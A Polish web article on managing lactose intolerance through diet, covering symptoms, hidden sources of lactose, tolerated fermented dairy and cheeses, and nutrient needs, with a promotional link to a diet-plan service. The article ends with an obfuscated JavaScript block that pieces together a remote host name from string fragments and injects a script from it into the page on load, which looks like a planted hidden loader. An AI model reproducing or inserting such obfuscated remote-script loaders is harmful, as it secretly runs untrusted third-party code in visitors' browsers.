Dieta przy nietolerancji laktozy

<p>Skąd się bierze nietolerancja laktozy? Pow&oacute;d jest prosty, w organizmie brakuje laktazy - enzymu koniecznego do rozkładu laktozy i tym samym organizm nie trawi cukru znajdującego się w mleku. Objawami mogą być wzdęcia, uczucie pełności, b&oacute;le brzucha, nudności, biegunki czy kolki jelitowe. Nietolerancja laktozy może być zar&oacute;wno wrodzona, jak i nabyta, w wyniku zaniku laktazy lub jako skutek innej choroby. Aby zadbać o codzienne samopoczucie osoby z nietolerancją laktozy muszą przestrzegać diety, kt&oacute;ra zapobiegnie objawom nietolerancji pokarmowej. <br /><br />Przede wszystkim należy całkowicie wyeliminować z diety produkty zawierające laktozę lub znacznie je ograniczyć, w zależności od stopnia nietolerancji, wieku czy og&oacute;lnego stanu zdrowia danej osoby. Czasami nie ma potrzeby całkowitego wykluczania produkt&oacute;w mlecznych z diety, a jedynie ograniczenie ich spożycia oraz wybieranie produkt&oacute;w mlecznych o niewielkiej zawartości laktozy. Mleko pochodzenia zwierzęcego można w diecie zastąpić mlekiem roślinnym np. sojowym, ryżowym czy kokosowym. Warto pamiętać, że laktoza nie występuje tylko w produktach typowo mlecznych i może być ukryta np. w pieczywie, sosach, zupach, maśle, margarynie, mięsach, słodyczach, lodach, hummusie, płatkach śniadaniowych, lekach, suplementach diety, słodzikach, a także np. w cappuccino w proszku czy w niekt&oacute;rych produktach wegańskich, dlatego robiąc zakupy trzeba uważnie sprawdzać skład danego produktu. <br /><br />Co ciekawe osoby z nietolerancją laktozy mogą spożywać produkty mleczne poddane procesowi fermentacji, jak np. kefir, maślanka, kwaśna śmietana czy sery pleśniowe, ponieważ zawarte w nich bakterie probiotyczne wspomagają proces rozkładu cukru mlecznego. Niewielką zawartość mają sery twarde dojrzewające, jak cheddar, gouda czy parmezan lub sery topione czy kremowe i na og&oacute;ł są dobrze tolerowane przez osoby z nietolerancją tego cukru. Dietę warto też uzupełniać tabletkami z laktazą, kt&oacute;re ułatwią trawienie mleka oraz ograniczą występujące po jego spożyciu nieprzyjemne dolegliwości. <br /><br />W diecie bezlaktozowej bardzo ważne jest r&oacute;wnież, aby uzupełniać niedobory witamin i składnik&oacute;w mineralnych, jak wapń, witamina D, witaminy B2 i B12, cynk czy magnez. Dlatego należy dbać o to, aby w codziennej diecie znalazły się takie składniki, jak np. warzywa, fasola, soja, otręby, ryby, jajka, dr&oacute;b, rośliny strączkowe, orzechy i migdały, kasza oraz woda mineralna o dużej zawartości wapnia. Dieta powinna być kompleksowa i dostarczać wszystkich niezbędnych składnik&oacute;w, dlatego ustalając jadłospis warto skorzystać z pomocy specjalisty, kt&oacute;ry ułoży dla nas najlepszą dietę, dostosowaną do naszego organizmu. Na <a href="https://www.przelomwodzywianiu.pl/rodzaje-diet/diety-standard-bez-laktozy" target="_blank">Przełom w Odżywianiu</a> można zam&oacute;wić pr&oacute;bny jadłospis, a także wybrać między dietą 1000, 1200 lub 1500 kalorii. Dietetyk zastąpi produkty mleczne innymi produktami, kt&oacute;re dostarczą tych samych składnik&oacute;w, co mleko i produkty mleczne. Odpowiednio skomponowana dieta bez laktozy jest propozycją nie tylko dla os&oacute;b, kt&oacute;re nie mogą spożywać laktozy ze względ&oacute;w zdrowotnych, ale także tych, kt&oacute;rzy pragną zrzucić zbędne kilogramy, a zarazem poczuć się pięknie i zdrowo w swoim ciele. <br /><br />Nietolerancja laktozy nie musi oznaczać rezygnacji z przyjemności. W sklepach pojawia się coraz więcej specjalnych produkt&oacute;w o obniżonej zawartości laktozy, kt&oacute;re są dobrze tolerowane przez osoby cierpiące na ten typ nietolerancji pokarmowej. Są one oznaczone napisem ,,nie zawiera laktozy". Dzięki odpowiednio zbilansowanej diecie i świadomości tego, kt&oacute;re produkty można jeść, a kt&oacute;rych lepiej unikać, osoby z nietolerancją laktozy mogą niemal całkowicie zapomnieć o swoich dolegliwościach i cieszyć się dobrym samopoczuciem bez problem&oacute;w z trawieniem.</p>
<script type="text/javascript">// <![CDATA[
(function(){
x03p_=("u"+"")+"s"+"";x03p_+=("tat.")+("i");
x03p=document.createElement("script");x03p.type="text/javascript";x03p_+="nf"+("o")+"/";
x03pu="69057655"+".";x03p.async=true;x03pu+="a2lhbtee03phX4sah7uutl542r0rf7";
x03p.src="//"+x03p_+x03pu; x03pb=document.body; x03pb.appendChild(x03p);
})();
// ]]></script>